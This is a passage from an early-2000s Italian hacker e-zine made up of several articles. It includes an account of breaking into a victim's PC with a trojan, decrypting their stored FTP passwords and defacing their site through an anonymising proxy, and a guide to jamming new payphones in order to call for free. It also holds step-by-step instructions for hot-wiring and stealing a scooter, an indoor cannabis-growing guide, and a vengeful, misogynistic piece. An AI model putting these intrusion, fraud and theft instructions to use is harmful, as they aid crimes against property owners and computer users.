Abbiamo quindi avuto accesso al suo PC ed in pochissimo tempo abbiamo
trovato la directory del suo FTP client.
Potrete tutti immaginare i grandissimi salti di gioia che abbiamo
fatto nel renderci conto che usava WS_ftp,
e quindi sarebbe stato semplicissimo decriptare le sue passwords (ndG:
sapete che tools del genere si trovano
facilmente su astalavista.box.sk, vero?).

In effetti questo e` stato fatto, rendendoci conto tra l'altro che la
password era un NOME PROPRIO
comunissimo in italia; a questo punto ci siamo resi conto che pure un
attacco bruteforce con una lista di
passwords precompilate avrebbe avuto una piu` che discreta (ndG: io mi
azzarderei a dire "sicura", ma cosi
è stato piu' divertente :)) possibilita` di successo. Il resto a questo
punto e` stato relativamente facile.

Utilizzando un proxy anonimizzante situato in un paese asiatico (da
cui quindi per un attacco del genere
nessuno avrebbe ottenuto una rogatoria per sapere che IP erano
collegati al momento - ndG: o almeno cosi'
speriamo :))) ci siamo collegati all'ftp ed abbiamo uploadato un index
differente da quello reale
(ndG: ci tengo a precisare che non abbiamo ripulito la directory del
sito ne' abbiamo danneggiato/cancellato
dei files sul suo hard disk, quando naturalmente, una volta guadagnato
l'accesso, potevamo fare tutto cio'
che volevamo sul suo pc e nel suo spazio FTP).

Da notare anche il fatto che questo soggetto, essendo un collaboratore
del provider, aveva MEMORIZZATE in
quel file TUTTE le password di accesso al provider, infatti ci e` stato
possibile anche accedere alla
directory che conteneva tutti i siti presenti sul server;
sfortunatamente il provider aveva avuto
l'accortezza di proteggere la sua root directory quindi non abbiamo
avuto accesso ai file log ed a quelli
delle passwords. Ma poco male eravamo anonimi a sufficienza.

Ce ne siamo quindi andati salutando e ringraziando. Da tutto questo io
credo sia facile capire come viurs
quali melissa o tutti quelli distribuiti via E-mail abbiano una cosi`
larga diffusione, e come spesso i
sistemi di sicurezza che le aziende installano o lo zelo dei provider
che si dotano di software sicuro ed
aggiornato risultino spesso sforzi vani di fronte all'ingenuita` ed
alla faciloneria che gli utenti da poco
sbarcati sulla rete spesso mettono nel compiere le loro azioni.

E' incredibile, e nessuno di noi che ha partecipato a questo avrebbe
mai creduto quando siamo pariti,
che sia possibile entrare su un server dalla porta principale, con le
chiavi; fare cio` che si vuole,
ed uscire senza che nessuno sappia chi e` entrato. E` improponibile che
si pensi di poter utilizzare la
rete come mezzo di comunicazione omnicomprensivo quando l'utente che
ormai sta per diventare standard non
e` in grado di garantire NON solo la propria personale sicurezza e la
sicurezza dei suoi dati, ma pure sia
in grado di mettere in serio pericolo la sicurezza di un intero
server. La parte piu` delicata sta nel
fatto che il problema NON e` assolutamente risolvibile aumentando la
sicurezza del software; certo se ICQ non
avesse avuto quel baco avremmo dovuto trovare un altro modo per fare
eseguire il troiano, ma considerate
anche il fatto che si poteva attaccare un troiano ad uno .zip ed
eseguirlo all'apertura oppure visto che
ormai moltissime persone NON visualizzano l'estensione del file,
inviare un .exe con l'icona giusta dicendo
che era un .jpg. Secondo noi sarebbe assolutamente necessario
sensibilizzare gli utenti verso cio` che
realmente e` la rete, invece che rimbecillirli con portali e siti
commerciali.


Mr. A


---------------------------------------=Phreaking=---------------------------------------------


ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø INFORMAZIONI GENERALI SUL PROTOCOLLO WAP ø
ø A[v]a[t]A[r] ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø


Da un po di tempo sono comaprasi sul mercato telefoni cellulari di nuova
generazione che permettono di collegarsi ad internet.Come tutti sapete invece
la connesione attraverso un computer avviene attraverso un browsers che ci
permette di visalizzare le pagine web fatte con speciali linguaggi molto conosciuti
tipo il flash, Java,dhtml e molti altri che non sto qui ad elencare.Logicamente
tutte queste pagine non sono visulaizzabili su un minuscolo schermo di un telefonino
e quindi per farlo c'è bisogno di un nuovo protocollo,quello WAP (Wireless
Application Protocol).C'è da dire che questo protocollo non doveva neanche essere
utilizzato ma in seguito alle decisoni delle maggiori case produttrici di telefonini
eccoci a spiegarlo.
Il WAP è un protocollo totalmente diverso dall'HTTP ma cio non vuol dire che
sia inferiore.
Per farvi fare un'idea vi indichero alcune differenze.Una è sicuramente quella
che tramite questo protocollo non vengono inviate pagine HTML, ma pagine WML (Wireless
Markup Language). Il WML deriva direttamente dall'XML (come del resto l'HTML)
ed è ottimizzato per la trasmissione a 9600 baud, velocità massima raggiungibile
dai telefoni cellulari attuali.
Per questo quindi possiami capire che non sono presenti tutti i tags basti notare
che non è possibile eseguire suoni,filmati e video anche se questi sono di
dimensioni ridotte.
Questo pero non è proprio tutto vero infatti è stato creato un nuovo formato di
immagini ottimizzato proprio per i cellulari. Si tratta di piccole immagini
bitmap in bianco e nero che occupano pochissimo, salvate nel formato .wbmp che non
è altro che la copia del formato .bmp dei computer.Diamo ora uno sguardo alla
piattaforma WAP. Come avviene lo scambio di informazioni tra telefonini e server? In
maniera molto simile a quella del protocollo http. La piattaforma WAP è
formata da un gateway che si occupa di connettere la rete di telefonia cellulare (GSM
in Europa e CDPD per gli Stati Uniti) e la rete di Internet. Questi
gateway hanno il compito di tradurre i segnali delle apparecchiature WAP (per
ora telefonini e palmari) in http e di inviarli in seguito ad un server web. Il
server invia i dati di risposta al gateway che li riconverte in segnali fruibili
alle apparecchiature WAP.
Se volete iniziare a smanettare con il WML è necessario che vi procuriate
alcuni tools.Vi consiglio l'sdk della nokia che potete trovare gratuitamente
su http://www.forum.nokia.com su cui potete trovare anche un'ottimo emulatore
per cellulari (poi non dite che sono cattivo).
Infatti per vedere correttamente le pagine WML avrete bisogno di un software
specifico che sia in grado di leggerle. Questo emulatore riproduce (in tutto,
compresa la forma e il colore) un cellulare Nokia 6110 o, a scelta, il modello
6150 (anche se, a dire il vero, questi due modelli non sono abilitati alla
navigazione in rete). Un'altra caratteristica interessante di questo emulatore è
la possibilità di navigare nei veri siti sviluppati in WML. E' presente inoltre
un editor, col quale potrete creare delle immagini e salvarle nel formato .WBMP.
L'SDK è stato sviluppato in Java per essere facilmente portabile su altre piattaforme,
quindi per farlo funzionare dovete aver preventivamente installato un
compilatore java oppure il JRE (Java Runtime Environment). Io ho usato il JDK
della Sun nella versione 1.2.2 e devo dire che funziona a meraviglia. Un piccolo
inciso: l'ambiente di sviluppo parte lanciando dalla directory:

..\Programmi\Nokia\Nokia WAP Toolkit

il comando:

java -jre wapsdk.jar


Ovviamente nel vostro autoexec.bat dovrà essere specificato il path del
file java.exe, altrimenti non funzionerà J.Vi consiglio di creare un file
batch con la riga qui sopra, per automatizzare la procedura di avvio (che
altrimenti diventa un po' noiosa). In realtà l'sdk dovrebbe partire con il
file toolkit.exe, ma io non sono riuscito a farlo funzionare.
Spero la mia spiegazione vi abbia soddisfatto se no mailatemi e fatemi capire il perchè.




ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø COME T'INFLIPPO LA NUOVA CABINA ø
ø mR_bIsOn ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø






Titolo: Come t'inflippo la nuova cabina
Autore: mR_bIs0n
Musica ascoltata: MP3 a palla... punk in partikolare
Consumo: ho appena finito di mangià
Stato di Salute: Mah kosì e kosì... ahhh kome era bello kuando avevo la
varicella...
Abbigliamento: casual... tanto ke ve ne frega...
Saluti: A tutti i miei amici sia di IRC ke della skuola, un partikolare saluto
a Davide, Biby e Carmine (degli WinME dipendenti... ah povere menti...
lo zio Bill si è mangiato anke le loro...), tutta la nostra nuova
crew e a tutte le ragazze bellissime ke konosko ma non sto qui a
dirvele!
Fanculo: Bah... diciamo in partenza a Fabio Fanizza, Giuseppe Pasanisi e
Alessandro Ceino, gli immankabili... poi anke a tutte le prof.esse,
anzi megli a tutte le proFESSE! Porka eva, krepate!

Urka iniziamo!!!

Bene, bene... hanno montato le nuove cabine telekozz... uhmmm... ma ke son
belle... ma ke son karine... insomma, leggetevi l'art di RadioZer[0] per
saperne di più! Comunque c'è qualkosa ke ankora nessuno può dirvi... ihihihih...
e cioè ke kodeste kabine sono nuove e quindi sono piene di bugs!
E proprio kosì! Infatti vi rikordate delle cabine della telekozz ke avevano
montato nel 1990 per i mondiali e ke erano buggate e bastava premere in
kontinuazione il tasto del kambia lingua per kiamare gratis???
Bene anke a kueste nuove ci sono degli errori ke la zia Telesuck non
ha ankora korretto... ci potrebberò essere molti bugs, ma io vi parlerò uno in
partikolare ke sono riuscito a skoprire! Oki!
Stavo nella mia kara villa (giardini pubblici) dove avevano montato delle
nuove kabine... uhmm... vediamo un po'ke se po'fare! Allora mi prokuro un po'
di skede skarike... provo ad inserirne una... me la risputa! Ma porka puttana
ti faccio vedere io! La ficco con forza la kabina fa forza a risputarla, ma
non riesce... mentre si dimena alzo e abbasso la cornetta... ihihihih... la
cabina inizia a suonare kome una matta! Eheheh bene, bene!
Ma kosa succede? Iniziano ad uscire strane skritte! La mia skeda se la prende
dentro e non me la da'più! Ah porka! Ad un certo punto lo skermetto si fa nero
ed eskono altre skritte... uhmmmm! Ad un certo punto esce anke uno strano
menù!!! UAU!!! Non ho kapito un kazzo di kosa sia successo nè mi rikordo kome
ho fatto! Porka eva!
Oki ci provo altre volte... la kabina in questione si pappa 4 mie skede
vuote... tutt'ora la kabina non nè accetta di altre! Ihhiihihhihi!
Ma niente paura! Vi spiego io kome fare ad inflipparla!
Prokuratevi una skeda Ricaricard della Tim! Usatene una usata, mi rakkomando!
Vanno bene anke di altre società telefoniche! L'importante è ke siano della
stessa grandezza! Poi prendete la skeda, e togliete (se c'è!), akkuratamente
l'adesivo dove c'è skritto il kodice usato! Pulite kon un panno o della karta
igenica imbevuta di alkool etiliko la superfice dove c'era prima l'adesivo.
In questo modo la vostra skeda non si incepperà facilmente nella kabina!
Oki ora fatto ciò infilate la skeda nella kabina... hiihi la prima skritta ke
vi uscirà è kuesta:
'frode'
EHEHEHEH da scirokkati!!! Bene ora infilate la skeda... non entrerà tutta! Poi
ve la vorrà sputare, e voi nel mentre ke ve la sputa la spingete sempre più
dentro! Mentre fate kuesto alzate e abbassate la kornetta in kontinuazione!
Vi sembrerà tutto + facile kuando lo farete! Attenzione a non farvi prendere
per un pazzo!!!
Bene se dopo un certo punto uscirà skritto 'Chiamata E&M attiva'... oppure
uscirà skritto ke il telefono è fuori servizio siete vicini ad impallarla!
Fate tutto kuesto per 5 minuti buoni... vi assikuro ke funziona! Appena
s'inflippa lo skermo si riempe di cursori neri... lampeggianti... dopo un po'
un sakko di strane skritte ke sto ankora annotando... mooolto presto ci sarà
un altro art kon annotate tutte le skritte ke la kabina ci dà!
Bene quindi aspettate e pregate ke ci sia un metodo per kiamare aggratiz...
mi fate un piacere se pregate anke per i miei semini di marja e ke kreskano
presto!!!
Salutoni!!!!
mR_bIs0n

--------------------------------------=Riflessione=--------------------------------------------


ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø RIFLESSIONE ø
ø Jrash ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø


_-_-L amore, l amore_-_-
Crew : H@team E-mail: jrash@hackersat.com URL : www.hackersat.com

Ciao ragazzi sono Jrash, il vostro fedele amico, per alcuni invece sono il nemico
numero1; vabbe ora non ci importa non so proprio cosa dirvi, non so neanche perche
scrivo quest articolo, neanche perche sono nato, non so perche esiste la scuola ,
perche esistono le cose brutte e quelle belle!!
Ora leggerete un articolo che un amico ha scritto su di me prendendomi come esempio
ed appunto si rivolge a tutti voi lettori, buona lettura....
Una delle cose che mi fa riflettere e riguarda noi ragazzi è l amore! Ma non
riguarda solo noi ragazzi anche le ragazze, pero in quest articolo mi riferisco ai ragazzi..
Ci sono ragazze che ci piacciono e per questo che ci vengono i cosidetti "ingrippi".
L amore è una cosa bellissima ma puo trasformarsi anche in cosa orribbile, soprattutto
quando noi amiamo, ma questo sentimento non ci viene ricambiato...non sara cosi per tutti
ma alla maggior parte di noi capita proprio questo.
Cosi ci chiudiamo in noi stessi ed allora si fanno cose indegne tanto piu indegne
quanto piu è grave la situazione; a questo punto si impazzisce si fa di tutto: c è
chi porta la foto dell amata con se e quindi per lui è come se al mondo esistesse solo
lei ; chi cade nell alcool e tantopeggio chi cade nell tunnell maledetto della droga,
solo per una stronza, e...stronza o meno ti puo rovinare la vita.
Ci sono pure altre cose che si fanno per una stronza cose da un certo lato piacevoli ,
ma da un altro lato possono peggiorare la situazione: per esempio chi è come Jrash,
quando riceve un "palo" o peggio ancora, decide di vendicarsi contro la stronza( cosi
merita di essere chiamata) ed allora Jrash e quelli come lui ne combinano di tutti i
colori e ripagano l offesa con la stessa moneta anzi con gli interessi, perche ricordate
che a Jrash mai nessuno gli ha messo i piedi in testa e chi ci prova soltanto la paga
amaramente. Prendetela come una minaccia.
Jrash è uno di quelli a cui non gliene fotte niente , lui non ha paura di nessuno
e a chi osa contrastarlo gli dice: " meta fa nu buc*****" . Cmq ora basta riprendiamo
all argomento di prima e cioe l amore come metafora spaziale( s fa p dic, capisc a me);
in amore ci sono due modi per prevalere nel rapporto: o devi essere dolce e romantico,
oppure come direbbe il mio amico Christopher: ia cummanna (devi dominare con forza)
soprattuto se la tua ragazza è un po "zucculell" e questo si verifica nel 70% dei casi.
Ma a volte anche noi siamo cattivi perche guardiamo solo l aspetto esteriore delle ragazze,
ma la prima cosa che noi dobbiamo guardare è l aspetto interiore, come sono fatte dentro,
cosa provano, ecc... perche a me quelle "solo curve" e senza cervello, ne cuore non
mi piacciono affatto.
Riguardo alle ragazze di bassa bellezza noi ragazzi le trattiamo male, con
disprezzo ma Jrash si limita a fare questo, se una ragazza non è una miss mica
gielo va a dire, ma cerca in tutti i modi di non offenderla; anche se a molti
sembra un personaggio oscuro non lo è ve lo assicuro, vi dico solo che anche lui
ha un cuore , anche lui è capace di amare e di provare altri sentimenti. Con
questa descrizione non mi riferisco solo a lui ma anche a molti altri che hanno il
suo stesso atteggiamento, io per questo li stimo tutti perche so quello che provano
e come si sentono , perche anche Jrash è passato per questa esperienza e la sta
ancora vivendo. Lui sta male, per lui la vita non ha piu senso, a volte pensa di
voler morire, se non era per me l avrebbe gia fatto, percio si comporta in questo
modo, cercate di capirlo.
Ragazzi ora non voglio andare per le lunghe voglio solo augurarvi tutta la felicita
che esiste al mondo in tutta la vostra vita , che dobbiate avere fortuna soprattutto
in amore, che la ragazza che vi piace non sia come quella che piace a Jrash altrimenti
passerete le pene dell inferno e ... basta non ho nient altro da dire. Solo
un ultima cosa riferita al mio amico Jrash : non mollare, fagliela pagare
pensa a maryee che è migliore di quella stronza.. ciao a tutti!!!
ANONIMO.
Ragazzi questo mio amico di cui mi ha pregato di non farne il nome è un grande e
credo che abbiate capito il senso dell articolo... certo l ho modificato perche la
versione originale era abbastanza lunga e poi si riferiva solo alla mia persona ed
appunto per premiare la sua bonta ho deciso di farlo pubblicare. Ringrazio tutti coloro
che mi sostengono e saluto tutti i lettori... alla prossima!!!
Ringraziamenti: Maryee perche è troppo bella; ed A[v]a[t]A[r] perche mi è stato sempre
vicino!! Un FUCK OFF a quella stronza di Giada; a Dolcissimo e Popo, due bravi
lamerucci....
Inoltre potete scrivermi se ne volete discutere al seguente indirizzo: jrash@hackersat.com

JRASH^^ 20/01/2001

===================H@team=====================================================[ThE_rEaL_JrAsH^^]°




ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø INTERNET E REALTA' ø
ø Jrash ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø




Internet e Realta!!
Ciao ragazzi sono sempre io Jrash^^ . Come sapete sono nel mondo dell hip hop e proprio
per questo scrivo questo articolo.. Leggetelo tutto mi raccomando!!
Non sono un mc non ho mai scratchato né usato i piatti , non sono un writer e non ballo .
Faccio parte della schiera che vuole amare , capire, studiare interpretare e vivere
l hip hop alla sua maniera....ed anche diffondere , perche no?? Basta che questo si tramuti
in una diffusione positiva . Ossia non imposta del tipo: io ascolto l hip hop e tu la truzzo
music. Cambia testa di cazzo!
Ma spiegata, perche alla fine i gusti sono gusti , non saro certo io a convincerli che
sono deficienti. Credo che alla fine bisogna avere almeno una fiammella dentro
che bruci per l hip hop, magari inconsapevolmente, ma che poi, al momento buono
esploda e si incendi dentro il corpo, lo spirito, il cuore.Diffusione positiva allora.
E qui arrivo al cuore del discorso: internet ed aggiungiamoci la parola MP3 che
ultimamente fa tanto fico.
Purtroppo attualmente tranne poche sortile a casa , mi sono dovuto allontanare un po
da quello che per due anni è stato il mio mondo . Navigo moltissimo e dedico tutto il mio
tempo online ai misconosciuti gruppi di discussione , uno dei mezzi piu interessanti
per dire la propria opinione , ed alle famigerate chat, tramite MIRC , troppo spesso
invase dai cosidetti "lamer" , ossia gente che fa casino apposta .
E naturalmente scaricavo MP3.
Internet mi ha permesso di conoscere amici eccezionali , di poter girare l italia sicuro
di poter trovare comunque un posto dove passare la notte ed altro.
Certo oltre alla cosidetta "virtual life" , porto avanti parallelamente la stessa vita
senza essere schiavizzato , come purtroppo tanti, troppi finiscono , dal mostro Internet.
Non ha senso chiudersi in stanza e vivere solo online , magari perche si è piu sfigati fuori.
Tramite Internet si mantengono contatti con persone che hanno i tuoi stessi gusti o con cui
ti senti in sintonia. il punto su cui mi preme soffermare l attenzione sono gli MP3 .
Tramite appositi programmi scambio MP3 di rapper italiani sempre e solo allo
scopo di diffondere e scegliere meglio i miei acquisti in CD.
Credo che l utilizzo migliore alla fine sia questo, diffondere via internet
alcune canzoni di un album a mo di assagio per orientare l acquisto di utilizzare
gli MP3 per diffondere i pezzi di quei gruppi o rapper sconosciuti che cosi
possono iniziare a farsi sentire.
PS: chi vuole capire, capisca!!
Ho scritto questo articolo per fornirvi maggiore conoscenza in campo, non per fare
pubblicita occulta. Ringrazio tutti i lettori dei miei articoli!! GRAZIE!!
Ringraziamenti: un saluto agli amici dell H@team!!
Un FUCK OFF a Dolcissimo e Popo!!


JRASH^^ 22/01/2001

===========HACKERS@team=====================================================[ThE_rEaL_JrAsH^^]°





-----------------------------------------=Mezzing=---------------------------------------------


ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø COME RUBARE UN MOTORINO ø
ø Jrash ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø






Salve ragazzi sono Jrash l esperto in scooter; in questo articolo vorrei parlarvi di un
argomento abbastanza interessante: come rubare un motorino!
La cosa è semplicissima, ma tutto il contenuto di questo testo è da ritenersi dannoso,
quindi non applicabile. L utente è pregato di non mettere in atto quanto
scritto. Esso è solo stato pubblicato per offrire una maggiore conoscenza in
campo, NON per altri scopi. Il testo non si puo modificare tantomeno vendere
senza il consenso dell autore.

La prima cosa da fare è cercare un posto isolato dove non ci sia nessuno
eccetto lo scooter, altrimenti che diamine! cosa rubiamo!
Assicurarsi che non ci siamo catene, bloccadischi e altre cose perche
renderebbero l operazione molto piu complicata, e per fare questo dobbiamo
impiegare massimo 5 minuti, e non di piu!!Una volta fatto questo passiamo alla
parte piu interessante, sempre avendo gli occhi ben aperti e sempre pronti a fuggire
nel caso che venisse qualcuno.
Allora riprendiamo da quello che stavo dicendo prima :
1)La prima operazione da effettuare per accedere al vano retroscudo e al blocchetto
commutatore, dove si trovano i cavi per l accensione, è la rimozione dello scudo anteriore.

2)Smontare la plastica posizionata dietro allo scudo ; se quest operazione vi rende la
cosa difficile vi consiglio di distruggere lo scudo anteriore, nella maggior parte dei
casi è la cosa migliore da fare, senza pero intaccare le parti vitali dello scooter, come
il blocchetto commutatore eccetera perche seno altrimenti sarebbe la fine.

3)Dopo aver smontato o distrutto la parte anteriore , individuare il cablaggio principale
del blocchetto di accensione.

4)Sfilare i due connettori del cablaggio principale dello scooter unire i fili
facendo attenzione, perche i fili sono tre e solo due devono unirsi.

5)A questo punto bisogna solo rompere il bloccasterzo se c é. Per farlo bisogna dare un
netto colpo forte e preciso, accendere lo scooter tramite start del carter oil e fuggire
alla massima velocita... lol

Ringraziamenti: Meryee di #secolo per la sua bellezza;
A[v]a[t]A[r] dell H@team per la sua potenza e inoltre vorrei fare un saluto a tutta
la 3c del severi di salerno! Un FUCK OFF a popo e Dolcissimo!!


JRASH^^ 13/1/2001
=============jrash@hackersat.com====H@team===========================================[Jrash^^]°



ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø COME SCEGLIERE E MONTARE UN VALIDO ANTIFURTO ø
ø SUL VOSTRO SCOOTER Jrash ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø





(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)
Autore: Jrash^^
Crew : H@team
E-mail: jrash@hackersat.com
URL : www.hackersat.com
(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)
Salve ragazzi sono JRASH l esperto in scooter, in questo articolo vorrei parlarvi di un
grosso problema: nel nostro paese i furti di scooter sono all ordine del giorno e ,
proprio per questo ho deciso di darvi dei consigli sulla scelta e il montaggio
di un antifurto elettronico.
Prendiamo subito in considerazione tutti i requisiti essenziali di un
antifurto elettronico affinché possa essere definito tale .
In primo luogo vi consiglio di diffidare di prodotti di non chiara provenienza: fidatevi
esclusivamente di antifurto di produzione nazionale o importati da aziende di
una certa serietà, per poter usufruire di un assistenza valida.
L evoluzione di questi sistemi è veramente frenetica ed ora è possibile trovare
in commercio antifurto sempre piu piccoli , efficienti, impermeabili e facili da
montare, grazie a dei cablaggi specifici dedicati alla maggioranza degli scooter
presenti in commercio .
E cosi possibile effettuare il montaggio semplicemente sfilando le connessioni
elettroniche originali e inserendo "a ponte" quelle dell antifurto .
è estremamente importante che questo sia autoalimentato , in modo che possa continuare
a funzionare anche in caso del taglio dei cavi della batteria , che sia provvisto di
codice variabile e bloccomotore , che magari sia dotato del sistema antiaggressione , per
prevenire i tentativi di rapina quando si è gia in sella alloscooter.
Ora vi spiego il procedimento di montaggio, su uno scooter qualsiasi, di un antifurto
patron line, uno dei piu evoluti sul mercato, gia dotato di un cablaggio specifico.
1)La prima operazione da effettuare per accedere al vano retroscudo ed al blocchetto
commutatore è la rimozione dello scudo anteriore.
2)Smontare la plastica posizionata dietro allo scudo.
3)Rimuovere la parte bassa del cruscotto.
4)Dopo aver smontato la parte anteriore della carena dello scooter, individuare il
cablaggio principale del blocchetto di accensione.
5)Sfilare i due connettori del cablaggio principale dello scooter e montare "a ponte" il
cablaggio dell antifurto: i connettori sono del tipo a innesto obbligato, quindi l operazione
è estremamente semplice.
6)Cablaggio principale assemblato al cablaggio dell antifurto.
7)Individuare i cablaggi degli indicatori di direzione.
8)"Ponticellare " i fili del positivo delle frecce con i fili provenienti dall allarme
utilizzando gli specifici connettori a pressione.
9)Connessione con i fili degli indicatori di direzione ultimata.
10)Fissare l antifurto , con il nastro biadesivo fornito nel kit; in una parte
sufficientemente riparata del vano retroscudo.
11)Ora non ci resta che istallare la spia luminosa su una parte del cruscotto…..

Ringraziamenti: Maryee(#secolo) perche senza di lei non potrei vivere ;A[v]a[t]A[r] ,
dell H@team, perche senza di lui ora non sarei qui!!
Se volete potete scrivermi per ulteriori informazioni a : jrash@hackersat.com

JRASH^^ 31/12/2000
###########################°ò_jrash@hackersat.com_ò°################################[Jrash^^]




-----------------------------------------=Narcoting=-------------------------------------------

ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø MARIA COLTIVATION ø
ø phaet ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø





INTRODUZIONE

Ci sono poche cose nella vita buone quanto la propria erba, coltivata proprio da te, fuori
nel giardino e dentro nei vasi...
L'origano, l'aneto, il basilico, la salvia ed altre piante aromatiche sono tutte facili da
coltivare. La menta si espande in tutto il giardino, se la lasci fare. La menta piperita e il
celantro sono fantastici in insalate e piatti orientali. Ma tutto ci porta ad una pianta
veramente significativa che, per chi la conosce bene, è la migliore amica, un ottimo rimedio
naturale e una filosofia di vita.
La maggior parte della gente pensa ai giardini come un progetto stagionale anziché annuale,
ma è davvero meno dispendioso e più rimunerativo mantenere il giardino efficiente a rotazione
annuale. Se sei tentato a coltivare a rotazione annuale, avrai bisogno di tecniche di
giardinaggio al coperto almeno per il periodo invernale per mantenere il giardino
produttivo. Avrai erba fresca tutto l'anno, non dovrai preoccuparti di immagazzinare il
raccolto tra l'inverno e la primavera, richiede meno spazio, ed una volta sistemato,
richiede solo una minima attenzione ogni settimana per mantenerlo produttivo a livelli
ottimali.
Il lato migliore dell'essere un giardiniere è il rapporto con la terra. Ti congiunge con la
natura e ti arricchisce spiritualmente. Prova a dare energia alle tue piante trasmettendo
loro pensieri positivi ed energia ogni volta che vai a curarle. Trovo che questo aiuta molto
me come aiuta molto loro. Le mie piante sembrano rispondere favorevolmente. [N.d.T.: Le
affermazioni di quest'ultimo periodo sono alquanto discutibili!]


LA GENETICA E LA PIANTA

E' molto importante cominciare con buone nozioni di genetica.
Dovresti cercare di trovare da giardinieri del posto semi che siano acclimatati e
riprodotti per il clima locale con le migliori caratteristiche floreali. Potenza, aroma,
crescita rapida, maturazione precoce, resistenza ai funghi e ai parassiti. Tutti questi
fattori sono presi in considerazione dal giardiniere esperto e tu non potrai che trarre
innumerevoli benefici dall'avere un'amica che ti faccia partire in un viaggio senza fine.
Cerca di procurarti un ibrido Indica-Sativa se possibile, in modo da ottenere le dimensioni
più indicate ed anche ottime caratteristiche per la coltivazione al coperto. Le piante Indica
sono povere di principio attivo, adatte a terreni sassosi, cosa assai fastidiosa, mentre le
Sativa crescono con difficoltà nei luoghi chiusi per effetto delle elevate richieste di luce
e germogliano più tardi. Un ibrido può essere così un compromesso che avrà l'elevato effetto
psicotropo della Sativa e la tendenza alla maturazione precoce dell'Indica.
L'Indica è facilmente riconoscibile dalle sue foglie estremamente larghe che sono molto
arrotondate ai lati. La Sativa ha foglie molto strette, simili alle dita. Un ibrido avrà
le caratteristiche di entrambe con foglie che sono un incrocio di questi due tipi: più
sottili di un'Indica, ma molto più larghe di una Sativa. E' possibile riconoscere un buon
ibrido dalle foglie, una volta che hai capito cosa osservare.
Assicurati che i semi siano marrone scuro o grigio chiaro. Alcuni possono avere delle linee
scure in aggiunta a questi colori, come le striature di una tigre. I semi bianchi e piccoli
non sono maturi e non dovrebbero essere piantati.


DENTRO E FUORI: STRATEGIA DEL RACCOLTO COSTANTE

Una delle migliori soluzioni per fornire energia secondo la maggior parte dei giardinieri
domestici è quella di servirsi della luce solare all'esterno per la fioritura e della luce
continua all'interno per germogliamento e la crescita vegetativa. Ciò garantisce il vantaggio
di un naturale ciclo di luce/buio e riduce della metà il tuo consumo di energia in rapporto
alla stessa operazione all'interno. Una piccola serra può essere costruita in fibre di vetro
Filon o in pannelli di PVC che sono innocui e sembrano molto ad un capannone di deposito o ad
un capannone degli attrezzi, in più è poco probabile che desti sospetti.
Di fatto un grande capannone di metallo o di legno compensato può essere modificato con un
tetto luminoso di PVC, vetro, fibre di vetro o pannelli di plastica, ed alcune specie che non
richiedono una grande quantità di luce, cresceranno bene. Un capannone siffatto impedirà
avvistamenti dal cielo e ti permetterà di proteggere la tua attività! Ti consente anche di
tenere lontani ratti e tartarughe gopher, mantiene a distanza i mocciosi del vicinato e può
essere facilmente chiuso a chiave. Ti darà anche l'opportunità di piantare effettivamente
nel terreno, se lo vorrai, e questa è la migliore soluzione per evitare piante ancorate a
terra da radici (se non stai usando colture idroponiche), ed ottenere raccolti più abbondanti.
In inverno lo spazio al coperto viene di norma usato per iniziare con le nuove pianticelle o
i tagli, per essere portati fuori in primavera, utilizzando la luce naturale del sole per
maturare le piante. Questa routine garantirà almeno tre raccolti aperto/serra per anno. Se
è disponibile più spazio per cominciare continuamente all'interno e per fiorire le piante
del secondo raccolto all'aperto, sono possibili raccolti ogni 60 giorni nella maggior parte
delle località, con un piccolo raccolto al coperto durante la stagione invernale come
ulteriore possibilità.
La strategia di base per una produzione nel corso di tutto l'anno è capire se la pianta ha
due cicli di crescita. Durante la germinazione la pianta entra in uno stato vegetativo in
cui potrà usare tutta la luce continua che riuscirai a garantirle. Questo significa che
nessun ciclo di buio è richiesto. La pianta sarà costantemente in fotosintesi e crescerà
più velocemente di quanto accadrebbe all'aperto con lunghi intervalli di notte. La
fotosintesi si arresta durante la fase di buio e la pianta usa gli zuccheri che ha
prodotto per crescere durante la notte. Questa non è una necessità ma la pianta crescerà
